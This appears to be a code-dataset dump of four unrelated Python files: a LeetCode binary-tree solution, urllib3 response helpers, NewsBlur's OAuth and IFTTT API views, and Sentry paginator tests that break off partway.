code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
#Given a binary tree containing digits from 0-9 only, each root-to-leaf path could represent a number.
#
#An example is the root-to-leaf path 1->2->3 which represents the number 123.
#
#Find the total sum of all root-to-leaf numbers.
#
#For example,
#
# 1
# / \
# 2 3
#The root-to-leaf path 1->2 represents the number 12.
#The root-to-leaf path 1->3 represents the number 13.
#
#Return the sum = 12 + 13 = 25.
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def sumNumbers(self, root):
"""
:type root: TreeNode
:rtype: int
"""
stk=[]
ans=0
if root:
stk=[[root,root.val]]
while stk:
z=stk.pop()
if z[0].left:
stk.append([z[0].left,z[1]*10+z[0].left.val])
if z[0].right:
stk.append([z[0].right,z[1]*10+z[0].right.val])
elif not z[0].left:
ans+=z[1]
return ans
| 95subodh/Leetcode | 129. Sum Root to Leaf Numbers.py | Python | mit | 960 |
from __future__ import absolute_import
from ..packages.six.moves import http_client as httplib
from ..exceptions import HeaderParsingError
def is_fp_closed(obj):
"""
Checks whether a given file-like object is closed.
:param obj:
The file-like object to check.
"""
try:
# Check `isclosed()` first, in case Python3 doesn't set `closed`.
# GH Issue #928
return obj.isclosed()
except AttributeError:
pass
try:
# Check via the official file-like-object way.
return obj.closed
except AttributeError:
pass
try:
# Check if the object is a container for another file-like object that
# gets released on exhaustion (e.g. HTTPResponse).
return obj.fp is None
except AttributeError:
pass
raise ValueError("Unable to determine whether fp is closed.")
def assert_header_parsing(headers):
"""
Asserts whether all headers have been successfully parsed.
Extracts encountered errors from the result of parsing headers.
Only works on Python 3.
:param headers: Headers to verify.
:type headers: `httplib.HTTPMessage`.
:raises urllib3.exceptions.HeaderParsingError:
If parsing errors are found.
"""
# This will fail silently if we pass in the wrong kind of parameter.
# To make debugging easier add an explicit check.
if not isinstance(headers, httplib.HTTPMessage):
raise TypeError("expected httplib.Message, got {0}.".format(type(headers)))
defects = getattr(headers, "defects", None)
get_payload = getattr(headers, "get_payload", None)
unparsed_data = None
if get_payload:
# get_payload is actually email.message.Message.get_payload;
# we're only interested in the result if it's not a multipart message
if not headers.is_multipart():
payload = get_payload()
if isinstance(payload, (bytes, str)):
unparsed_data = payload
if defects or unparsed_data:
raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data)
def is_response_to_head(response):
"""
Checks whether the request of a response has been a HEAD-request.
Handles the quirks of AppEngine.
:param conn:
:type conn: :class:`httplib.HTTPResponse`
"""
# FIXME: Can we do this somehow without accessing private httplib _method?
method = response._method
if isinstance(method, int): # Platform-specific: Appengine
return method == 3
return method.upper() == "HEAD"
| RalfBarkow/Zettelkasten | venv/lib/python3.9/site-packages/pip/_vendor/urllib3/util/response.py | Python | gpl-3.0 | 2,573 |
import urllib
import datetime
import lxml.html
import tweepy
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.http import HttpResponseForbidden, HttpResponseRedirect
from django.conf import settings
from mongoengine.queryset import NotUniqueError
from mongoengine.queryset import OperationError
from apps.social.models import MSocialServices, MSocialSubscription, MSharedStory
from apps.social.tasks import SyncTwitterFriends, SyncFacebookFriends, SyncAppdotnetFriends
from apps.reader.models import UserSubscription, UserSubscriptionFolders, RUserStory
from apps.analyzer.models import MClassifierTitle, MClassifierAuthor, MClassifierFeed, MClassifierTag
from apps.analyzer.models import compute_story_score
from apps.rss_feeds.models import Feed, MStory, MStarredStoryCounts, MStarredStory
from apps.rss_feeds.text_importer import TextImporter
from utils import log as logging
from utils.user_functions import ajax_login_required, oauth_login_required
from utils.view_functions import render_to
from utils import urlnorm
from utils import json_functions as json
from vendor import facebook
from vendor import appdotnet
@login_required
@render_to('social/social_connect.xhtml')
def twitter_connect(request):
twitter_consumer_key = settings.TWITTER_CONSUMER_KEY
twitter_consumer_secret = settings.TWITTER_CONSUMER_SECRET
oauth_token = request.REQUEST.get('oauth_token')
oauth_verifier = request.REQUEST.get('oauth_verifier')
denied = request.REQUEST.get('denied')
if denied:
logging.user(request, "~BB~FRDenied Twitter connect")
return {'error': 'Denied! Try connecting again.'}
elif oauth_token and oauth_verifier:
try:
auth = tweepy.OAuthHandler(twitter_consumer_key, twitter_consumer_secret)
auth.request_token = request.session['twitter_request_token']
# auth.set_request_token(oauth_token, oauth_verifier)
auth.get_access_token(oauth_verifier)
api = tweepy.API(auth)
twitter_user = api.me()
except (tweepy.TweepError, IOError), e:
logging.user(request, "~BB~FRFailed Twitter connect: %s" % e)
return dict(error="Twitter has returned an error. Try connecting again.")
# Be sure that two people aren't using the same Twitter account.
existing_user = MSocialServices.objects.filter(twitter_uid=unicode(twitter_user.id))
if existing_user and existing_user[0].user_id != request.user.pk:
try:
user = User.objects.get(pk=existing_user[0].user_id)
logging.user(request, "~BB~FRFailed Twitter connect, another user: %s" % user.username)
return dict(error=("Another user (%s, %s) has "
"already connected with those Twitter credentials."
% (user.username, user.email or "no email")))
except User.DoesNotExist:
existing_user.delete()
social_services = MSocialServices.get_user(request.user.pk)
social_services.twitter_uid = unicode(twitter_user.id)
social_services.twitter_access_key = auth.access_token
social_services.twitter_access_secret = auth.access_token_secret
social_services.syncing_twitter = True
social_services.save()
SyncTwitterFriends.delay(user_id=request.user.pk)
logging.user(request, "~BB~FRFinishing Twitter connect")
return {}
else:
# Start the OAuth process
auth = tweepy.OAuthHandler(twitter_consumer_key, twitter_consumer_secret)
auth_url = auth.get_authorization_url()
request.session['twitter_request_token'] = auth.request_token
logging.user(request, "~BB~FRStarting Twitter connect: %s" % auth.request_token)
return {'next': auth_url}
@login_required
@render_to('social/social_connect.xhtml')
def facebook_connect(request):
facebook_app_id = settings.FACEBOOK_APP_ID
facebook_secret = settings.FACEBOOK_SECRET
args = {
"client_id": facebook_app_id,
"redirect_uri": "http://" + Site.objects.get_current().domain + reverse('facebook-connect'),
"scope": "user_friends",
"display": "popup",
}
verification_code = request.REQUEST.get('code')
if verification_code:
args["client_secret"] = facebook_secret
args["code"] = verification_code
uri = "https://graph.facebook.com/oauth/access_token?" + \
urllib.urlencode(args)
response_text = urllib.urlopen(uri).read()
response = json.decode(response_text)
if "access_token" not in response:
logging.user(request, "~BB~FRFailed Facebook connect, no access_token. (%s): %s" % (args, response))
return dict(error="Facebook has returned an error. Try connecting again.")
access_token = response["access_token"]
# Get the user's profile.
graph = facebook.GraphAPI(access_token)
profile = graph.get_object("me")
uid = profile["id"]
# Be sure that two people aren't using the same Facebook account.
existing_user = MSocialServices.objects.filter(facebook_uid=uid)
if existing_user and existing_user[0].user_id != request.user.pk:
try:
user = User.objects.get(pk=existing_user[0].user_id)
logging.user(request, "~BB~FRFailed FB connect, another user: %s" % user.username)
return dict(error=("Another user (%s, %s) has "
"already connected with those Facebook credentials."
% (user.username, user.email or "no email")))
except User.DoesNotExist:
existing_user.delete()
social_services = MSocialServices.get_user(request.user.pk)
social_services.facebook_uid = uid
social_services.facebook_access_token = access_token
social_services.syncing_facebook = True
social_services.save()
SyncFacebookFriends.delay(user_id=request.user.pk)
logging.user(request, "~BB~FRFinishing Facebook connect")
return {}
elif request.REQUEST.get('error'):
logging.user(request, "~BB~FRFailed Facebook connect, error: %s" % request.REQUEST.get('error'))
return {'error': '%s... Try connecting again.' % request.REQUEST.get('error')}
else:
# Start the OAuth process
logging.user(request, "~BB~FRStarting Facebook connect")
url = "https://www.facebook.com/dialog/oauth?" + urllib.urlencode(args)
return {'next': url}
@login_required
@render_to('social/social_connect.xhtml')
def appdotnet_connect(request):
domain = Site.objects.get_current().domain
args = {
"client_id": settings.APPDOTNET_CLIENTID,
"client_secret": settings.APPDOTNET_SECRET,
"redirect_uri": "http://" + domain +
reverse('appdotnet-connect'),
"scope": ["email", "write_post", "follow"],
}
oauth_code = request.REQUEST.get('code')
denied = request.REQUEST.get('denied')
if denied:
logging.user(request, "~BB~FRDenied App.net connect")
return {'error': 'Denied! Try connecting again.'}
elif oauth_code:
try:
adn_auth = appdotnet.Appdotnet(**args)
response = adn_auth.getAuthResponse(oauth_code)
adn_resp = json.decode(response)
access_token = adn_resp['access_token']
adn_userid = adn_resp['user_id']
except (IOError):
logging.user(request, "~BB~FRFailed App.net connect")
return dict(error="App.net has returned an error. Try connecting again.")
# Be sure that two people aren't using the same Twitter account.
existing_user = MSocialServices.objects.filter(appdotnet_uid=unicode(adn_userid))
if existing_user and existing_user[0].user_id != request.user.pk:
try:
user = User.objects.get(pk=existing_user[0].user_id)
logging.user(request, "~BB~FRFailed App.net connect, another user: %s" % user.username)
return dict(error=("Another user (%s, %s) has "
"already connected with those App.net credentials."
% (user.username, user.email or "no email")))
except User.DoesNotExist:
existing_user.delete()
social_services = MSocialServices.get_user(request.user.pk)
social_services.appdotnet_uid = unicode(adn_userid)
social_services.appdotnet_access_token = access_token
social_services.syncing_appdotnet = True
social_services.save()
SyncAppdotnetFriends.delay(user_id=request.user.pk)
logging.user(request, "~BB~FRFinishing App.net connect")
return {}
else:
# Start the OAuth process
adn_auth = appdotnet.Appdotnet(**args)
auth_url = adn_auth.generateAuthUrl()
logging.user(request, "~BB~FRStarting App.net connect")
return {'next': auth_url}
@ajax_login_required
def twitter_disconnect(request):
logging.user(request, "~BB~FRDisconnecting Twitter")
social_services = MSocialServices.objects.get(user_id=request.user.pk)
social_services.disconnect_twitter()
return HttpResponseRedirect(reverse('load-user-friends'))
@ajax_login_required
def facebook_disconnect(request):
logging.user(request, "~BB~FRDisconnecting Facebook")
social_services = MSocialServices.objects.get(user_id=request.user.pk)
social_services.disconnect_facebook()
return HttpResponseRedirect(reverse('load-user-friends'))
@ajax_login_required
def appdotnet_disconnect(request):
logging.user(request, "~BB~FRDisconnecting App.net")
social_services = MSocialServices.objects.get(user_id=request.user.pk)
social_services.disconnect_appdotnet()
return HttpResponseRedirect(reverse('load-user-friends'))
@ajax_login_required
@json.json_view
def follow_twitter_account(request):
username = request.POST['username']
code = 1
message = "OK"
logging.user(request, "~BB~FR~SKFollowing Twitter: %s" % username)
if username not in ['samuelclay', 'newsblur']:
return HttpResponseForbidden()
social_services = MSocialServices.objects.get(user_id=request.user.pk)
try:
api = social_services.twitter_api()
api.create_friendship(username)
except tweepy.TweepError, e:
code = -1
message = e
return {'code': code, 'message': message}
@ajax_login_required
@json.json_view
def unfollow_twitter_account(request):
username = request.POST['username']
code = 1
message = "OK"
logging.user(request, "~BB~FRUnfollowing Twitter: %s" % username)
if username not in ['samuelclay', 'newsblur']:
return HttpResponseForbidden()
social_services = MSocialServices.objects.get(user_id=request.user.pk)
try:
api = social_services.twitter_api()
api.destroy_friendship(username)
except tweepy.TweepError, e:
code = -1
message = e
return {'code': code, 'message': message}
@oauth_login_required
def api_user_info(request):
user = request.user
return json.json_response(request, {"data": {
"name": user.username,
"id": user.pk,
}})
@oauth_login_required
@json.json_view
def api_feed_list(request, trigger_slug=None):
user = request.user
try:
usf = UserSubscriptionFolders.objects.get(user=user)
except UserSubscriptionFolders.DoesNotExist:
return {"errors": [{
'message': 'Could not find feeds for user.'
}]}
flat_folders = usf.flatten_folders()
titles = [dict(label=" - Folder: All Site Stories", value="all")]
feeds = {}
user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)
for sub in user_subs:
feeds[sub.feed_id] = sub.canonical()
for folder_title in sorted(flat_folders.keys()):
if folder_title and folder_title != " ":
titles.append(dict(label=" - Folder: %s" % folder_title, value=folder_title, optgroup=True))
else:
titles.append(dict(label=" - Folder: Top Level", value="Top Level", optgroup=True))
folder_contents = []
for feed_id in flat_folders[folder_title]:
if feed_id not in feeds: continue
feed = feeds[feed_id]
folder_contents.append(dict(label=feed['feed_title'], value=str(feed['id'])))
folder_contents = sorted(folder_contents, key=lambda f: f['label'].lower())
titles.extend(folder_contents)
return {"data": titles}
@oauth_login_required
@json.json_view
def api_folder_list(request, trigger_slug=None):
user = request.user
usf = UserSubscriptionFolders.objects.get(user=user)
flat_folders = usf.flatten_folders()
if 'add-new-subscription' in request.path:
titles = []
else:
titles = [dict(label="All Site Stories", value="all")]
for folder_title in sorted(flat_folders.keys()):
if folder_title and folder_title != " ":
titles.append(dict(label=folder_title, value=folder_title))
else:
titles.append(dict(label="Top Level", value="Top Level"))
return {"data": titles}
@oauth_login_required
@json.json_view
def api_saved_tag_list(request):
user = request.user
starred_counts, starred_count = MStarredStoryCounts.user_counts(user.pk, include_total=True)
tags = []
for tag in starred_counts:
if not tag['tag'] or tag['tag'] == "": continue
tags.append(dict(label="%s (%s %s)" % (tag['tag'], tag['count'],
'story' if tag['count'] == 1 else 'stories'),
value=tag['tag']))
tags = sorted(tags, key=lambda t: t['value'].lower())
catchall = dict(label="All Saved Stories (%s %s)" % (starred_count,
'story' if starred_count == 1 else 'stories'),
value="all")
tags.insert(0, catchall)
return {"data": tags}
@oauth_login_required
@json.json_view
def api_shared_usernames(request):
user = request.user
social_feeds = MSocialSubscription.feeds(user_id=user.pk)
blurblogs = []
for social_feed in social_feeds:
if not social_feed['shared_stories_count']: continue
blurblogs.append(dict(label="%s (%s %s)" % (social_feed['username'],
social_feed['shared_stories_count'],
'story' if social_feed['shared_stories_count'] == 1 else 'stories'),
value="%s" % social_feed['user_id']))
blurblogs = sorted(blurblogs, key=lambda b: b['label'].lower())
catchall = dict(label="All Shared Stories",
value="all")
blurblogs.insert(0, catchall)
return {"data": blurblogs}
@oauth_login_required
@json.json_view
def api_unread_story(request, trigger_slug=None):
user = request.user
body = request.body_json
after = body.get('after', None)
before = body.get('before', None)
limit = body.get('limit', 50)
fields = body.get('triggerFields')
feed_or_folder = fields['feed_or_folder']
entries = []
if isinstance(feed_or_folder, int) or feed_or_folder.isdigit():
feed_id = int(feed_or_folder)
try:
usersub = UserSubscription.objects.get(user=user, feed_id=feed_id)
except UserSubscription.DoesNotExist:
return dict(data=[])
found_feed_ids = [feed_id]
found_trained_feed_ids = [feed_id] if usersub.is_trained else []
stories = usersub.get_stories(order="newest", read_filter="unread",
offset=0, limit=limit,
default_cutoff_date=user.profile.unread_cutoff)
else:
folder_title = feed_or_folder
if folder_title == "Top Level":
folder_title = " "
usf = UserSubscriptionFolders.objects.get(user=user)
flat_folders = usf.flatten_folders()
feed_ids = None
if folder_title != "all":
feed_ids = flat_folders.get(folder_title)
usersubs = UserSubscription.subs_for_feeds(user.pk, feed_ids=feed_ids,
read_filter="unread")
feed_ids = [sub.feed_id for sub in usersubs]
params = {
"user_id": user.pk,
"feed_ids": feed_ids,
"offset": 0,
"limit": limit,
"order": "newest",
"read_filter": "unread",
"usersubs": usersubs,
"cutoff_date": user.profile.unread_cutoff,
}
story_hashes, unread_feed_story_hashes = UserSubscription.feed_stories(**params)
mstories = MStory.objects(story_hash__in=story_hashes).order_by('-story_date')
stories = Feed.format_stories(mstories)
found_feed_ids = list(set([story['story_feed_id'] for story in stories]))
trained_feed_ids = [sub.feed_id for sub in usersubs if sub.is_trained]
found_trained_feed_ids = list(set(trained_feed_ids) & set(found_feed_ids))
if found_trained_feed_ids:
classifier_feeds = list(MClassifierFeed.objects(user_id=user.pk,
feed_id__in=found_trained_feed_ids))
classifier_authors = list(MClassifierAuthor.objects(user_id=user.pk,
feed_id__in=found_trained_feed_ids))
classifier_titles = list(MClassifierTitle.objects(user_id=user.pk,
feed_id__in=found_trained_feed_ids))
classifier_tags = list(MClassifierTag.objects(user_id=user.pk,
feed_id__in=found_trained_feed_ids))
feeds = dict([(f.pk, {
"title": f.feed_title,
"website": f.feed_link,
"address": f.feed_address,
}) for f in Feed.objects.filter(pk__in=found_feed_ids)])
for story in stories:
if before and int(story['story_date'].strftime("%s")) > before: continue
if after and int(story['story_date'].strftime("%s")) < after: continue
score = 0
if found_trained_feed_ids and story['story_feed_id'] in found_trained_feed_ids:
score = compute_story_score(story, classifier_titles=classifier_titles,
classifier_authors=classifier_authors,
classifier_tags=classifier_tags,
classifier_feeds=classifier_feeds)
if score < 0: continue
if trigger_slug == "new-unread-focus-story" and score < 1: continue
feed = feeds.get(story['story_feed_id'], None)
entries.append({
"StoryTitle": story['story_title'],
"StoryContent": story['story_content'],
"StoryURL": story['story_permalink'],
"StoryAuthor": story['story_authors'],
"PublishedAt": story['story_date'].strftime("%Y-%m-%dT%H:%M:%SZ"),
"StoryScore": score,
"Site": feed and feed['title'],
"SiteURL": feed and feed['website'],
"SiteRSS": feed and feed['address'],
"meta": {
"id": story['story_hash'],
"timestamp": int(story['story_date'].strftime("%s"))
},
})
if after:
entries = sorted(entries, key=lambda s: s['meta']['timestamp'])
logging.user(request, "~FYChecking unread%s stories with ~SB~FCIFTTT~SN~FY: ~SB%s~SN - ~SB%s~SN stories" % (" ~SBfocus~SN" if trigger_slug == "new-unread-focus-story" else "", feed_or_folder, len(entries)))
return {"data": entries[:limit]}
@oauth_login_required
@json.json_view
def api_saved_story(request):
user = request.user
body = request.body_json
after = body.get('after', None)
before = body.get('before', None)
limit = body.get('limit', 50)
fields = body.get('triggerFields')
story_tag = fields['story_tag']
entries = []
if story_tag == "all":
story_tag = ""
params = dict(user_id=user.pk)
if story_tag:
params.update(dict(user_tags__contains=story_tag))
mstories = MStarredStory.objects(**params).order_by('-starred_date')[:limit]
stories = Feed.format_stories(mstories)
found_feed_ids = list(set([story['story_feed_id'] for story in stories]))
feeds = dict([(f.pk, {
"title": f.feed_title,
"website": f.feed_link,
"address": f.feed_address,
}) for f in Feed.objects.filter(pk__in=found_feed_ids)])
for story in stories:
if before and int(story['story_date'].strftime("%s")) > before: continue
if after and int(story['story_date'].strftime("%s")) < after: continue
feed = feeds.get(story['story_feed_id'], None)
entries.append({
"StoryTitle": story['story_title'],
"StoryContent": story['story_content'],
"StoryURL": story['story_permalink'],
"StoryAuthor": story['story_authors'],
"PublishedAt": story['story_date'].strftime("%Y-%m-%dT%H:%M:%SZ"),
"SavedAt": story['starred_date'].strftime("%Y-%m-%dT%H:%M:%SZ"),
"Tags": ', '.join(story['user_tags']),
"Site": feed and feed['title'],
"SiteURL": feed and feed['website'],
"SiteRSS": feed and feed['address'],
"meta": {
"id": story['story_hash'],
"timestamp": int(story['starred_date'].strftime("%s"))
},
})
if after:
entries = sorted(entries, key=lambda s: s['meta']['timestamp'])
logging.user(request, "~FCChecking saved stories from ~SBIFTTT~SB: ~SB%s~SN - ~SB%s~SN stories" % (story_tag if story_tag else "[All stories]", len(entries)))
return {"data": entries}
@oauth_login_required
@json.json_view
def api_shared_story(request):
user = request.user
body = request.body_json
after = body.get('after', None)
before = body.get('before', None)
limit = body.get('limit', 50)
fields = body.get('triggerFields')
blurblog_user = fields['blurblog_user']
entries = []
if isinstance(blurblog_user, int) or blurblog_user.isdigit():
social_user_ids = [int(blurblog_user)]
elif blurblog_user == "all":
socialsubs = MSocialSubscription.objects.filter(user_id=user.pk)
social_user_ids = [ss.subscription_user_id for ss in socialsubs]
mstories = MSharedStory.objects(
user_id__in=social_user_ids
).order_by('-shared_date')[:limit]
stories = Feed.format_stories(mstories)
found_feed_ids = list(set([story['story_feed_id'] for story in stories]))
share_user_ids = list(set([story['user_id'] for story in stories]))
users = dict([(u.pk, u.username)
for u in User.objects.filter(pk__in=share_user_ids).only('pk', 'username')])
feeds = dict([(f.pk, {
"title": f.feed_title,
"website": f.feed_link,
"address": f.feed_address,
}) for f in Feed.objects.filter(pk__in=found_feed_ids)])
classifier_feeds = list(MClassifierFeed.objects(user_id=user.pk,
social_user_id__in=social_user_ids))
classifier_authors = list(MClassifierAuthor.objects(user_id=user.pk,
social_user_id__in=social_user_ids))
classifier_titles = list(MClassifierTitle.objects(user_id=user.pk,
social_user_id__in=social_user_ids))
classifier_tags = list(MClassifierTag.objects(user_id=user.pk,
social_user_id__in=social_user_ids))
# Merge with feed specific classifiers
classifier_feeds = classifier_feeds + list(MClassifierFeed.objects(user_id=user.pk,
feed_id__in=found_feed_ids))
classifier_authors = classifier_authors + list(MClassifierAuthor.objects(user_id=user.pk,
feed_id__in=found_feed_ids))
classifier_titles = classifier_titles + list(MClassifierTitle.objects(user_id=user.pk,
feed_id__in=found_feed_ids))
classifier_tags = classifier_tags + list(MClassifierTag.objects(user_id=user.pk,
feed_id__in=found_feed_ids))
for story in stories:
if before and int(story['shared_date'].strftime("%s")) > before: continue
if after and int(story['shared_date'].strftime("%s")) < after: continue
score = compute_story_score(story, classifier_titles=classifier_titles,
classifier_authors=classifier_authors,
classifier_tags=classifier_tags,
classifier_feeds=classifier_feeds)
if score < 0: continue
feed = feeds.get(story['story_feed_id'], None)
entries.append({
"StoryTitle": story['story_title'],
"StoryContent": story['story_content'],
"StoryURL": story['story_permalink'],
"StoryAuthor": story['story_authors'],
"PublishedAt": story['story_date'].strftime("%Y-%m-%dT%H:%M:%SZ"),
"StoryScore": score,
"Comments": story['comments'],
"Username": users.get(story['user_id']),
"SharedAt": story['shared_date'].strftime("%Y-%m-%dT%H:%M:%SZ"),
"Site": feed and feed['title'],
"SiteURL": feed and feed['website'],
"SiteRSS": feed and feed['address'],
"meta": {
"id": story['story_hash'],
"timestamp": int(story['shared_date'].strftime("%s"))
},
})
if after:
entries = sorted(entries, key=lambda s: s['meta']['timestamp'])
logging.user(request, "~FMChecking shared stories from ~SB~FCIFTTT~SN~FM: ~SB~FM%s~FM~SN - ~SB%s~SN stories" % (blurblog_user, len(entries)))
return {"data": entries}
@json.json_view
def ifttt_status(request):
logging.user(request, "~FCChecking ~SBIFTTT~SN status")
return {"data": {
"status": "OK",
"time": datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ"),
}}
@oauth_login_required
@json.json_view
def api_share_new_story(request):
user = request.user
body = request.body_json
fields = body.get('actionFields')
story_url = urlnorm.normalize(fields['story_url'])
story_content = fields.get('story_content', "")
story_title = fields.get('story_title', "")
story_author = fields.get('story_author', "")
comments = fields.get('comments', None)
logging.user(request.user, "~FBFinding feed (api_share_new_story): %s" % story_url)
original_feed = Feed.get_feed_from_url(story_url, create=True, fetch=True)
story_hash = MStory.guid_hash_unsaved(story_url)
feed_id = (original_feed and original_feed.pk or 0)
if not user.profile.is_premium and MSharedStory.feed_quota(user.pk, story_hash, feed_id=feed_id):
return {"errors": [{
'message': 'Only premium users can share multiple stories per day from the same site.'
}]}
quota = 3
if MSharedStory.feed_quota(user.pk, story_hash, quota=quota):
logging.user(request, "~BM~FRNOT ~FYSharing story from ~SB~FCIFTTT~FY, over quota: ~SB%s: %s" % (story_url, comments))
return {"errors": [{
'message': 'You can only share %s stories per day.' % quota
}]}
if not story_content or not story_title:
ti = TextImporter(feed=original_feed, story_url=story_url, request=request)
original_story = ti.fetch(return_document=True)
if original_story:
story_url = original_story['url']
if not story_content:
story_content = original_story['content']
if not story_title:
story_title = original_story['title']
if story_content:
story_content = lxml.html.fromstring(story_content)
story_content.make_links_absolute(story_url)
story_content = lxml.html.tostring(story_content)
shared_story = MSharedStory.objects.filter(user_id=user.pk,
story_feed_id=original_feed and original_feed.pk or 0,
story_guid=story_url).limit(1).first()
if not shared_story:
title_max = MSharedStory._fields['story_title'].max_length
story_db = {
"story_guid": story_url,
"story_permalink": story_url,
"story_title": story_title and story_title[:title_max] or "[Untitled]",
"story_feed_id": original_feed and original_feed.pk or 0,
"story_content": story_content,
"story_author_name": story_author,
"story_date": datetime.datetime.now(),
"user_id": user.pk,
"comments": comments,
"has_comments": bool(comments),
}
try:
shared_story = MSharedStory.objects.create(**story_db)
socialsubs = MSocialSubscription.objects.filter(subscription_user_id=user.pk)
for socialsub in socialsubs:
socialsub.needs_unread_recalc = True
socialsub.save()
logging.user(request, "~BM~FYSharing story from ~SB~FCIFTTT~FY: ~SB%s: %s" % (story_url, comments))
except NotUniqueError:
logging.user(request, "~BM~FY~SBAlready~SN shared story from ~SB~FCIFTTT~FY: ~SB%s: %s" % (story_url, comments))
else:
logging.user(request, "~BM~FY~SBAlready~SN shared story from ~SB~FCIFTTT~FY: ~SB%s: %s" % (story_url, comments))
try:
socialsub = MSocialSubscription.objects.get(user_id=user.pk,
subscription_user_id=user.pk)
except MSocialSubscription.DoesNotExist:
socialsub = None
if socialsub and shared_story:
socialsub.mark_story_ids_as_read([shared_story.story_hash],
shared_story.story_feed_id,
request=request)
elif shared_story:
RUserStory.mark_read(user.pk, shared_story.story_feed_id, shared_story.story_hash)
if shared_story:
shared_story.publish_update_to_subscribers()
return {"data": [{
"id": shared_story and shared_story.story_guid,
"url": shared_story and shared_story.blurblog_permalink()
}]}
@oauth_login_required
@json.json_view
def api_save_new_story(request):
user = request.user
body = request.body_json
fields = body.get('actionFields')
story_url = urlnorm.normalize(fields['story_url'])
story_content = fields.get('story_content', "")
story_title = fields.get('story_title', "")
story_author = fields.get('story_author', "")
user_tags = fields.get('user_tags', "")
story = None
logging.user(request.user, "~FBFinding feed (api_save_new_story): %s" % story_url)
original_feed = Feed.get_feed_from_url(story_url)
if not story_content or not story_title:
ti = TextImporter(feed=original_feed, story_url=story_url, request=request)
original_story = ti.fetch(return_document=True)
if original_story:
story_url = original_story['url']
if not story_content:
story_content = original_story['content']
if not story_title:
story_title = original_story['title']
try:
story_db = {
"user_id": user.pk,
"starred_date": datetime.datetime.now(),
"story_date": datetime.datetime.now(),
"story_title": story_title or '[Untitled]',
"story_permalink": story_url,
"story_guid": story_url,
"story_content": story_content,
"story_author_name": story_author,
"story_feed_id": original_feed and original_feed.pk or 0,
"user_tags": [tag for tag in user_tags.split(',')]
}
story = MStarredStory.objects.create(**story_db)
logging.user(request, "~FCStarring by ~SBIFTTT~SN: ~SB%s~SN in ~SB%s" % (story_db['story_title'][:50], original_feed and original_feed))
MStarredStoryCounts.count_for_user(user.pk)
except OperationError:
logging.user(request, "~FCAlready starred by ~SBIFTTT~SN: ~SB%s" % (story_db['story_title'][:50]))
pass
return {"data": [{
"id": story and story.id,
"url": story and story.story_permalink
}]}
@oauth_login_required
@json.json_view
def api_save_new_subscription(request):
user = request.user
body = request.body_json
fields = body.get('actionFields')
url = urlnorm.normalize(fields['url'])
folder = fields['folder']
if folder == "Top Level":
folder = " "
code, message, us = UserSubscription.add_subscription(
user=user,
feed_address=url,
folder=folder,
bookmarklet=True
)
logging.user(request, "~FRAdding URL from ~FC~SBIFTTT~SN~FR: ~SB%s (in %s)" % (url, folder))
if us and us.feed:
url = us.feed.feed_address
return {"data": [{
"id": us and us.feed_id,
"url": url,
}]}
| manderson23/NewsBlur | apps/oauth/views.py | Python | mit | 34,202 |
from __future__ import absolute_import
from datetime import timedelta
from django.utils import timezone
from unittest import TestCase as SimpleTestCase
from sentry.api.paginator import (
BadPaginationError,
Paginator,
DateTimePaginator,
OffsetPaginator,
SequencePaginator,
GenericOffsetPaginator,
reverse_bisect_left,
)
from sentry.models import User
from sentry.testutils import TestCase
from sentry.utils.cursors import Cursor
class PaginatorTest(TestCase):
cls = Paginator
def test_max_limit(self):
self.create_user("foo@example.com")
self.create_user("bar@example.com")
self.create_user("baz@example.com")
queryset = User.objects.all()
paginator = self.cls(queryset, "id", max_limit=10)
result = paginator.get_result(limit=2, cursor=None)
assert len(result) == 2
paginator = self.cls(queryset, "id", max_limit=1)
result = paginator.get_result(limit=2, cursor=None)
assert len(result) == 1
def test_count_hits(self):
self.create_user("foo@example.com")
self.create_user("bar@example.com")
queryset = User.objects.filter(email="foo@example.com")
paginator = self.cls(queryset, "id")
result = paginator.count_hits(1000)
assert result == 1
queryset = User.objects.all()
paginator = self.cls(queryset, "id")
result = paginator.count_hits(1000)
assert result == 2
queryset = User.objects.none()
paginator = self.cls(queryset, "id")
result = paginator.count_hits(1000)
assert result == 0
queryset = User.objects.all()
paginator = self.cls(queryset, "id")
result = paginator.count_hits(1)
assert result == 1
def test_prev_emptyset(self):
queryset = User.objects.all()
paginator = self.cls(queryset, "id")
result1 = paginator.get_result(limit=1, cursor=None)
res1 = self.create_user("foo@example.com")
result2 = paginator.get_result(limit=1, cursor=result1.prev)
assert len(result2) == 1, (result2, list(result2))
assert result2[0] == res1
result3 = paginator.get_result(limit=1, cursor=result2.prev)
assert len(result3) == 0, (result3, list(result3))
class OffsetPaginatorTest(TestCase):
# offset paginator does not support dynamic limits on is_prev
def test_simple(self):
res1 = self.create_user("foo@example.com")
res2 = self.create_user("bar@example.com")
res3 = self.create_user("baz@example.com")
queryset = User.objects.all()
paginator = OffsetPaginator(queryset, "id")
result1 = paginator.get_result(limit=1, cursor=None)
assert len(result1) == 1, result1
assert result1[0] == res1
assert result1.next
assert not result1.prev
result2 = paginator.get_result(limit=1, cursor=result1.next)
assert len(result2) == 1, (result2, list(result2))
assert result2[0] == res2
assert result2.next
assert result2.prev
result3 = paginator.get_result(limit=1, cursor=result2.next)
assert len(result3) == 1, result3
assert result3[0] == res3
assert not result3.next
assert result3.prev
result4 = paginator.get_result(limit=1, cursor=result3.next)
assert len(result4) == 0, result4
assert not result4.next
assert result4.prev
result5 = paginator.get_result(limit=1, cursor=result4.prev)
assert len(result5) == 1, result5
assert result5[0] == res3
assert not result5.next
assert result5.prev
def test_order_by_multiple(self):
res1 = self.create_user("foo@example.com")
self.create_user("bar@example.com")
res3 = self.create_user("baz@example.com")
queryset = User.objects.all()
paginator = OffsetPaginator(queryset, "id")
result = paginator.get_result(limit=1, cursor=None)
assert len(result) == 1, result
assert result[0] == res1
assert result.next
assert not result.prev
res3.update(is_active=False)
paginator = OffsetPaginator(queryset, ("is_active", "id"))
result = paginator.get_result(limit=1, cursor=None)
assert len(result) == 1, result
assert result[0] == res3
assert result.next
assert not result.prev
result = paginator.get_result(limit=1, cursor=result.next)
assert len(result) == 1, (result, list(result))
assert result[0] == res1
assert result.next
assert result.prev
